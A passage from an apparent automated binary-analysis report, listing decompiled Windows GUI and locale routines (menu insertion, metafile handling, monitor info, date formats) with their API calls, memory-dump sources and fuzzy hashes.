                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					_pop(_t88);
                                                                        				} else {
                                                                        					_push(__edx);
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					_pop(_t88);
                                                                        				}
                                                                        				_v12 = GetDesktopWindow();
                                                                        				_push(0x402);
                                                                        				_push(0);
                                                                        				_t33 = _v12;
                                                                        				_push(_t33);
                                                                        				L00406EBC();
                                                                        				_v16 = _t33;
                                                                        				_push(_t92);
                                                                        				_push(0x437183);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t94;
                                                                        				_v20 = SelectObject(_v16, E0041FC84( *((intOrPtr*)(_t88 + 0x40))));
                                                                        				_t89 = _v36;
                                                                        				_t83 = _v32;
                                                                        				PatBlt(_v16, _t89 + _t74, _t83, _v28 - _t89 - _t74, _t74, 0x5a0049);
                                                                        				PatBlt(_v16, _v28 - _t74, _t83 + _t74, _t74, _v24 - _t83 - _t74, 0x5a0049);
                                                                        				PatBlt(_v16, _t89, _v24 - _t74, _v28 - _v36 - _t74, _t74, 0x5a0049);
                                                                        				PatBlt(_v16, _t89, _t83, _t74, _v24 - _v32 - _t74, 0x5a0049);
                                                                        				SelectObject(_v16, _v20);
                                                                        				_pop(_t80);
                                                                        				 *[fs:eax] = _t80;
                                                                        				_push(0x43718a);
                                                                        				_push(_v16);
                                                                        				_t72 = _v12;
                                                                        				_push(_t72);
                                                                        				L00407124();
                                                                        				return _t72;
                                                                        			}






















                                                                        APIs
                                                                        • GetDesktopWindow.USER32 ref: 0043709F
                                                                        • 72E7ACE0.USER32(?,00000000,00000402), ref: 004370B2
                                                                        • SelectObject.GDI32(?,00000000), ref: 004370D5
                                                                        • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 004370FB
                                                                        • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043711D
                                                                        • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043713C
                                                                        • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 00437156
                                                                        • SelectObject.GDI32(?,?), ref: 00437163
                                                                        • 72E7B380.USER32(?,?,0043718A,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?), ref: 0043717D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ObjectSelect$B380DesktopWindow
                                                                        • String ID:
                                                                        • API String ID: 989747725-0
                                                                        • Opcode ID: e8a8121868ac27e57e4faa29e38f03b396699f147222c45ad547c2109a57c072
                                                                        • Instruction ID: 771ec133291533bbbaf77add90e3910cc377049704c9dec5494c1e876cde8f30
                                                                        • Opcode Fuzzy Hash: e8a8121868ac27e57e4faa29e38f03b396699f147222c45ad547c2109a57c072
                                                                        • Instruction Fuzzy Hash: 66310BB6A04219BFDB00DEADCC85DAFB7FCEF49704B014469B544F7281C679AD048BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E0040AFB0(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                        				char _v8;
                                                                        				char _v12;
                                                                        				char _v16;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				char _v28;
                                                                        				char _v32;
                                                                        				char _v36;
                                                                        				char _v40;
                                                                        				char _v44;
                                                                        				char _v48;
                                                                        				char _v52;
                                                                        				char _v56;
                                                                        				char _v60;
                                                                        				char _v64;
                                                                        				char _v68;
                                                                        				void* _t104;
                                                                        				void* _t111;
                                                                        				void* _t133;
                                                                        				intOrPtr _t183;
                                                                        				intOrPtr _t193;
                                                                        				intOrPtr _t194;
                                                                        
                                                                        				_t191 = __esi;
                                                                        				_t190 = __edi;
                                                                        				_t193 = _t194;
                                                                        				_t133 = 8;
                                                                        				do {
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_t133 = _t133 - 1;
                                                                        				} while (_t133 != 0);
                                                                        				_push(__ebx);
                                                                        				_push(_t193);
                                                                        				_push(0x40b27b);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t194;
                                                                        				E0040AE3C();
                                                                        				E00409A84(__ebx, __edi, __esi);
                                                                        				_t196 =  *0x4967fc;
                                                                        				if( *0x4967fc != 0) {
                                                                        					E00409C5C(__esi, _t196);
                                                                        				}
                                                                        				_t132 = GetThreadLocale();
                                                                        				E004099D4(_t43, 0, 0x14,  &_v20);
                                                                        				E0040439C(0x496730, _v20);
                                                                        				E004099D4(_t43, 0x40b290, 0x1b,  &_v24);
                                                                        				 *0x496734 = E004087C0(0x40b290, 0, _t196);
                                                                        				E004099D4(_t132, 0x40b290, 0x1c,  &_v28);
                                                                        				 *0x496735 = E004087C0(0x40b290, 0, _t196);
                                                                        				 *0x496736 = E00409A20(_t132, 0x2c, 0xf);
                                                                        				 *0x496737 = E00409A20(_t132, 0x2e, 0xe);
                                                                        				E004099D4(_t132, 0x40b290, 0x19,  &_v32);
                                                                        				 *0x496738 = E004087C0(0x40b290, 0, _t196);
                                                                        				 *0x496739 = E00409A20(_t132, 0x2f, 0x1d);
                                                                        				E004099D4(_t132, "m/d/yy", 0x1f,  &_v40);
                                                                        				E00409D0C(_v40, _t132,  &_v36, _t190, _t191, _t196);
                                                                        				E0040439C(0x49673c, _v36);
                                                                        				E004099D4(_t132, "mmmm d, yyyy", 0x20,  &_v48);
                                                                        				E00409D0C(_v48, _t132,  &_v44, _t190, _t191, _t196);
                                                                        				E0040439C(0x496740, _v44);
                                                                        				 *0x496744 = E00409A20(_t132, 0x3a, 0x1e);
                                                                        				E004099D4(_t132, 0x40b2c4, 0x28,  &_v52);
                                                                        				E0040439C(0x496748, _v52);
                                                                        				E004099D4(_t132, 0x40b2d0, 0x29,  &_v56);
                                                                        				E0040439C(0x49674c, _v56);
                                                                        				E00404348( &_v12);
                                                                        				E00404348( &_v16);
                                                                        				E004099D4(_t132, 0x40b290, 0x25,  &_v60);
                                                                        				_t104 = E004087C0(0x40b290, 0, _t196);
                                                                        				_t197 = _t104;
                                                                        				if(_t104 != 0) {
                                                                        					E004043E0( &_v8, 0x40b2e8);
                                                                        				} else {
                                                                        					E004043E0( &_v8, 0x40b2dc);
                                                                        				}
                                                                        				E004099D4(_t132, 0x40b290, 0x23,  &_v64);
                                                                        				_t111 = E004087C0(0x40b290, 0, _t197);
                                                                        				_t198 = _t111;
                                                                        				if(_t111 == 0) {
                                                                        					E004099D4(_t132, 0x40b290, 0x1005,  &_v68);
                                                                        					if(E004087C0(0x40b290, 0, _t198) != 0) {
                                                                        						E004043E0( &_v12, 0x40b304);
                                                                        					} else {
                                                                        						E004043E0( &_v16, 0x40b2f4);
                                                                        					}
                                                                        				}
                                                                        				_push(_v12);
                                                                        				_push(_v8);
                                                                        				_push(":mm");
                                                                        				_push(_v16);
                                                                        				E004046C0();
                                                                        				_push(_v12);
                                                                        				_push(_v8);
                                                                        				_push(":mm:ss");
                                                                        				_push(_v16);
                                                                        				E004046C0();
                                                                        				 *0x4967fe = E00409A20(_t132, 0x2c, 0xc);
                                                                        				_pop(_t183);
                                                                        				 *[fs:eax] = _t183;
                                                                        				_push(E0040B282);
                                                                        				return E0040436C( &_v68, 0x10);
                                                                        			}


























                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(00000000,0040B27B,?,?,00000000,00000000), ref: 0040AFE6
                                                                          • Part of subcall function 004099D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099F2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Locale$InfoThread
                                                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                        • API String ID: 4232894706-2493093252
                                                                        • Opcode ID: 57064a61c693a148e843b2285f5530ec02f9961804421419e221219622123def
                                                                        • Instruction ID: ab645d97e84e0256c4c4970a1fb5dcc84b1706c9c56c8f89f877431b82433d7f
                                                                        • Opcode Fuzzy Hash: 57064a61c693a148e843b2285f5530ec02f9961804421419e221219622123def
                                                                        • Instruction Fuzzy Hash: 28613A707001489BDB04EBE9E881A9F77A6DB98308F20947FA501BB3D6DA3CDD05879C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E00446428(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
                                                                        				char _v5;
                                                                        				char _v12;
                                                                        				char _v13;
                                                                        				struct tagMENUITEMINFOA _v61;
                                                                        				char _v68;
                                                                        				intOrPtr _t103;
                                                                        				CHAR* _t109;
                                                                        				char _t115;
                                                                        				short _t149;
                                                                        				void* _t154;
                                                                        				intOrPtr _t161;
                                                                        				intOrPtr _t184;
                                                                        				struct HMENU__* _t186;
                                                                        				int _t190;
                                                                        				void* _t192;
                                                                        				intOrPtr _t193;
                                                                        				void* _t196;
                                                                        				void* _t205;
                                                                        
                                                                        				_t155 = __ecx;
                                                                        				_v68 = 0;
                                                                        				_v12 = 0;
                                                                        				_v5 = __ecx;
                                                                        				_t186 = __edx;
                                                                        				_t154 = __eax;
                                                                        				_push(_t196);
                                                                        				_push(0x446683);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t196 + 0xffffffc0;
                                                                        				if( *((char*)(__eax + 0x3e)) == 0) {
                                                                        					L22:
                                                                        					_pop(_t161);
                                                                        					 *[fs:eax] = _t161;
                                                                        					_push(0x44668a);
                                                                        					E00404348( &_v68);
                                                                        					return E00404348( &_v12);
                                                                        				}
                                                                        				E004043E0( &_v12,  *((intOrPtr*)(__eax + 0x30)));
                                                                        				if(E00448264(_t154) <= 0) {
                                                                        					__eflags =  *((short*)(_t154 + 0x60));
                                                                        					if( *((short*)(_t154 + 0x60)) == 0) {
                                                                        						L8:
                                                                        						if((GetVersion() & 0x000000ff) < 4) {
                                                                        							_t190 =  *(0x47aa7c + ((E00404744( *((intOrPtr*)(_t154 + 0x30)), 0x4466a8) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0047AA70 |  *0x0047AA60 |  *0x0047AA68 | 0x00000400;
                                                                        							_t103 = E00448264(_t154);
                                                                        							__eflags = _t103;
                                                                        							if(_t103 <= 0) {
                                                                        								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E004047F8(_v12));
                                                                        							} else {
                                                                        								_t109 = E004047F8( *((intOrPtr*)(_t154 + 0x30)));
                                                                        								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0044692C(_t154), _t109);
                                                                        							}
                                                                        							goto L22;
                                                                        						}
                                                                        						_v61.cbSize = 0x2c;
                                                                        						_v61.fMask = 0x3f;
                                                                        						_t192 = E00448820(_t154);
                                                                        						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E00447E3C(_t154) == 0) {
                                                                        							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
                                                                        								L14:
                                                                        								_t115 = 0;
                                                                        								goto L16;
                                                                        							}
                                                                        							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
                                                                        							if(_t205 == 0) {
                                                                        								goto L15;
                                                                        							}
                                                                        							goto L14;
                                                                        						} else {
                                                                        							L15:
                                                                        							_t115 = 1;
                                                                        							L16:
                                                                        							_v13 = _t115;
                                                                        							_v61.fType =  *(0x47aab0 + ((E00404744( *((intOrPtr*)(_t154 + 0x30)), 0x4466a8) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0047AAA8 |  *0x0047AA84 |  *0x0047AAB8 |  *0x0047AAC0;
                                                                        							_v61.fState =  *0x0047AA90 |  *0x0047AAA0 |  *0x0047AA98;
                                                                        							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
                                                                        							_v61.hSubMenu = 0;
                                                                        							_v61.hbmpChecked = 0;
                                                                        							_v61.hbmpUnchecked = 0;
                                                                        							_v61.dwTypeData = E004047F8(_v12);
                                                                        							if(E00448264(_t154) > 0) {
                                                                        								_v61.hSubMenu = E0044692C(_t154);
                                                                        							}
                                                                        							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
                                                                        							goto L22;
                                                                        						}
                                                                        					}
                                                                        					_t193 =  *((intOrPtr*)(_t154 + 0x64));
                                                                        					__eflags = _t193;
                                                                        					if(_t193 == 0) {
                                                                        						L7:
                                                                        						_push(_v12);
                                                                        						_push(0x44669c);
                                                                        						E00445A8C( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
                                                                        						_push(_v68);
                                                                        						E004046C0();
                                                                        						goto L8;
                                                                        					}
                                                                        					__eflags =  *((intOrPtr*)(_t193 + 0x64));
                                                                        					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
                                                                        						goto L7;
                                                                        					}
                                                                        					_t184 =  *0x44531c; // 0x445368
                                                                        					_t149 = E00403768( *((intOrPtr*)(_t193 + 4)), _t184);
                                                                        					__eflags = _t149;
                                                                        					if(_t149 != 0) {
                                                                        						goto L8;
                                                                        					}
                                                                        					goto L7;
                                                                        				}
                                                                        				_v61.hSubMenu = E0044692C(_t154);
                                                                        				goto L8;
                                                                        			}






















                                                                        APIs
                                                                        • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 004465D4
                                                                        • GetVersion.KERNEL32(00000000,00446683), ref: 004464C4
                                                                          • Part of subcall function 0044692C: CreatePopupMenu.USER32(?,0044663F,00000000,00000000,00446683), ref: 00446947
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Menu$CreateInsertItemPopupVersion
                                                                        • String ID: ,$?$hSD
                                                                        • API String ID: 133695497-2744044814
                                                                        • Opcode ID: c33b320a3809bf8af9b9c0040c7416c45296dc4a54403c922eabdd25c516cfcc
                                                                        • Instruction ID: c1f226bee94c505ff5879a5e45d3f70f72b48b4718122b33157cbbefa9e75370
                                                                        • Opcode Fuzzy Hash: c33b320a3809bf8af9b9c0040c7416c45296dc4a54403c922eabdd25c516cfcc
                                                                        • Instruction Fuzzy Hash: BD611370A002409BEB10EF79DC816AE7BF5BF4A308F06457AE944E7396D738D845CB5A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetActiveWindow.USER32 ref: 00456733
                                                                        • GetWindowRect.USER32 ref: 0045678D
                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 004567C5
                                                                        • MessageBoxA.USER32 ref: 00456806
                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045687C,?,00000000,00456875), ref: 00456856
                                                                        • SetActiveWindow.USER32(?,0045687C,?,00000000,00456875), ref: 00456867
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$Active$MessageRect
                                                                        • String ID: (
                                                                        • API String ID: 3147912190-3887548279
                                                                        • Opcode ID: 3547273055f9fab4712ace14ffcd2524f14b860b50c39c87bf408079b6818cc4
                                                                        • Instruction ID: 7cbad7be9c4b48523c1cfc1a11d04e08d9ad09d2673b50e57f39b10a150b3f7a
                                                                        • Opcode Fuzzy Hash: 3547273055f9fab4712ace14ffcd2524f14b860b50c39c87bf408079b6818cc4
                                                                        • Instruction Fuzzy Hash: BE415EB5E00104AFDB04DFA9CD81FAE77F9EB48304F55446AF900EB392DA74AD008B54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00422CEA(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                        				intOrPtr* _v8;
                                                                        				int _v12;
                                                                        				BYTE* _v16;
                                                                        				intOrPtr _v18;
                                                                        				signed int _v24;
                                                                        				short _v26;
                                                                        				short _v28;
                                                                        				short _v30;
                                                                        				short _v32;
                                                                        				char _v38;
                                                                        				struct tagMETAFILEPICT _v54;
                                                                        				intOrPtr _v118;
                                                                        				intOrPtr _v122;
                                                                        				struct tagENHMETAHEADER _v154;
                                                                        				intOrPtr _t103;
                                                                        				intOrPtr _t115;
                                                                        				struct HENHMETAFILE__* _t119;
                                                                        				struct HENHMETAFILE__* _t120;
                                                                        				void* _t122;
                                                                        				void* _t123;
                                                                        				void* _t124;
                                                                        				void* _t125;
                                                                        				intOrPtr _t126;
                                                                        
                                                                        				_t124 = _t125;
                                                                        				_t126 = _t125 + 0xffffff68;
                                                                        				_v12 = __ecx;
                                                                        				_v8 = __edx;
                                                                        				_t122 = __eax;
                                                                        				E00422B88(__eax);
                                                                        				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
                                                                        				if(_v38 != 0x9ac6cdd7 || E00421870( &_v38) != _v18) {
                                                                        					E00420A20();
                                                                        				}
                                                                        				_v12 = _v12 - 0x16;
                                                                        				_v16 = E00402754(_v12);
                                                                        				_t103 =  *((intOrPtr*)(_t122 + 0x28));
                                                                        				 *[fs:eax] = _t126;
                                                                        				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x422e5b, _t124);
                                                                        				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
                                                                        				if(_v24 == 0) {
                                                                        					_v24 = 0x60;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
                                                                        				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
                                                                        				_v54.mm = 8;
                                                                        				_v54.xExt = 0;
                                                                        				_v54.yExt = 0;
                                                                        				_v54.hMF = 0;
                                                                        				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                                        				 *(_t103 + 8) = _t119;
                                                                        				if(_t119 == 0) {
                                                                        					E00420A20();
                                                                        				}
                                                                        				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
                                                                        				_v54.mm = 8;
                                                                        				_v54.xExt = _v122;
                                                                        				_v54.yExt = _v118;
                                                                        				_v54.hMF = 0;
                                                                        				DeleteEnhMetaFile( *(_t103 + 8));
                                                                        				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                                        				 *(_t103 + 8) = _t120;
                                                                        				if(_t120 == 0) {
                                                                        					E00420A20();
                                                                        				}
                                                                        				 *((char*)(_t122 + 0x2c)) = 0;
                                                                        				_pop(_t115);
                                                                        				 *[fs:eax] = _t115;
                                                                        				_push(E00422E62);
                                                                        				return E00402774(_v16);
                                                                        			}



























                                                                        APIs
                                                                        • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422D8E
                                                                        • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422DAB
                                                                        • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DD7
                                                                        • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DF7
                                                                        • DeleteEnhMetaFile.GDI32(00000016), ref: 00422E18
                                                                        • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00422E2B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileMeta$Bits$DeleteHeader
                                                                        • String ID: `
                                                                        • API String ID: 1990453761-2679148245
                                                                        • Opcode ID: 3a1adc593a487124711b27ce84d4190b2dfc95728f08b01ed21f342c1ee5f22a
                                                                        • Instruction ID: fb0f5a08ef807ff7da08fe929f8a7a8f4baacde4112ddcaebb4220c4adbca4e0
                                                                        • Opcode Fuzzy Hash: 3a1adc593a487124711b27ce84d4190b2dfc95728f08b01ed21f342c1ee5f22a
                                                                        • Instruction Fuzzy Hash: CC412F75E00218AFDB00DFA9D985AAEB7F9EF48710F51846AF404FB241D7789D40CB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00422CEC(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                        				intOrPtr* _v8;
                                                                        				int _v12;
                                                                        				BYTE* _v16;
                                                                        				intOrPtr _v18;
                                                                        				signed int _v24;
                                                                        				short _v26;
                                                                        				short _v28;
                                                                        				short _v30;
                                                                        				short _v32;
                                                                        				char _v38;
                                                                        				struct tagMETAFILEPICT _v54;
                                                                        				intOrPtr _v118;
                                                                        				intOrPtr _v122;
                                                                        				struct tagENHMETAHEADER _v154;
                                                                        				intOrPtr _t103;
                                                                        				intOrPtr _t115;
                                                                        				struct HENHMETAFILE__* _t119;
                                                                        				struct HENHMETAFILE__* _t120;
                                                                        				void* _t122;
                                                                        				void* _t123;
                                                                        				void* _t124;
                                                                        				void* _t125;
                                                                        				intOrPtr _t126;
                                                                        
                                                                        				_t124 = _t125;
                                                                        				_t126 = _t125 + 0xffffff68;
                                                                        				_v12 = __ecx;
                                                                        				_v8 = __edx;
                                                                        				_t122 = __eax;
                                                                        				E00422B88(__eax);
                                                                        				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
                                                                        				if(_v38 != 0x9ac6cdd7 || E00421870( &_v38) != _v18) {
                                                                        					E00420A20();
                                                                        				}
                                                                        				_v12 = _v12 - 0x16;
                                                                        				_v16 = E00402754(_v12);
                                                                        				_t103 =  *((intOrPtr*)(_t122 + 0x28));
                                                                        				 *[fs:eax] = _t126;
                                                                        				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x422e5b, _t124);
                                                                        				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
                                                                        				if(_v24 == 0) {
                                                                        					_v24 = 0x60;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
                                                                        				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
                                                                        				_v54.mm = 8;
                                                                        				_v54.xExt = 0;
                                                                        				_v54.yExt = 0;
                                                                        				_v54.hMF = 0;
                                                                        				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                                        				 *(_t103 + 8) = _t119;
                                                                        				if(_t119 == 0) {
                                                                        					E00420A20();
                                                                        				}
                                                                        				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
                                                                        				_v54.mm = 8;
                                                                        				_v54.xExt = _v122;
                                                                        				_v54.yExt = _v118;
                                                                        				_v54.hMF = 0;
                                                                        				DeleteEnhMetaFile( *(_t103 + 8));
                                                                        				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                                        				 *(_t103 + 8) = _t120;
                                                                        				if(_t120 == 0) {
                                                                        					E00420A20();
                                                                        				}
                                                                        				 *((char*)(_t122 + 0x2c)) = 0;
                                                                        				_pop(_t115);
                                                                        				 *[fs:eax] = _t115;
                                                                        				_push(E00422E62);
                                                                        				return E00402774(_v16);
                                                                        			}

                                                                        APIs
                                                                        • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422D8E
                                                                        • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422DAB
                                                                        • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DD7
                                                                        • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DF7
                                                                        • DeleteEnhMetaFile.GDI32(00000016), ref: 00422E18
                                                                        • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00422E2B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileMeta$Bits$DeleteHeader
                                                                        • String ID: `
                                                                        • API String ID: 1990453761-2679148245
                                                                        • Opcode ID: ec978911b333c8a9dc1ac6c849a624436fee95648c6e243f4a88b920bed035bd
                                                                        • Instruction ID: 01aed2916d9461752607c608983ec61ef17ba308f3f8825e499b2a2baebaa4d3
                                                                        • Opcode Fuzzy Hash: ec978911b333c8a9dc1ac6c849a624436fee95648c6e243f4a88b920bed035bd
                                                                        • Instruction Fuzzy Hash: DF412E75E00218AFDB00DFA9D985AAEB7F9EF48710F51846AF404FB241D7789D40CB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 67%
                                                                        			E00427548(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
                                                                        				void _v20;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t23;
                                                                        				int _t24;
                                                                        				struct HMONITOR__* _t27;
                                                                        				struct tagMONITORINFO* _t29;
                                                                        				intOrPtr* _t31;
                                                                        
                                                                        				_t29 = _a8;
                                                                        				_t27 = _a4;
                                                                        				if( *0x496ac8 != 0) {
                                                                        					_t24 = 0;
                                                                        					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                                        						_t29->rcMonitor.left = 0;
                                                                        						_t29->rcMonitor.top = 0;
                                                                        						_t29->rcMonitor.right = GetSystemMetrics(0);
                                                                        						_t29->rcMonitor.bottom = GetSystemMetrics(1);
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						_t31 = _t29;
                                                                        						 *(_t31 + 0x24) = 1;
                                                                        						if( *_t31 >= 0x4c) {
                                                                        							_push("DISPLAY");
                                                                        							_push(_t31 + 0x28);
                                                                        							L00406A9C();
